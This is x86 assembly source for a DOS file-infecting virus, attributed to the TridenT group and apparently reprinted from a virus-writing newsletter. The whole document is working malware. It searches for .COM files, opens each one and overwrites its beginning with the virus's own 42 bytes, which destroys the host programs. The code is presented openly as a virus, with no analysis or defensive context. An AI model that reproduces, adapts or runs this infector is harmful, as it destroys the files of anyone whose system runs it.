;OW-42 virus - TridenT group, edited for Crypt Newsletter 13 ; CODE SEGMENT ASSUME CS:CODE, DS:CODE, ES:CODE, SS:NOTHING org 0100h start: mov ah,4Eh ; find first file recurse: mov dx,0123h ; matching filemask, "*.*" int 21h db 72h,20h ;hand-coded jump on carry to ;exit if no more files found mov ax,3D01h mov dx,009Eh int 21h mov bh,40h mov dx,0100h ;starting from beginning xchg ax,bx ;put handle in ax mov cl,2Ah ;to write: 42 bytes of virus int 21h ;write the virus mov ah,3Eh ;close the file int 21h mov ah,4Fh ;find next file jmp Short recurse db "*.COM" ;file_mask dw 0C300h ;hand-coded return CODE ENDS END START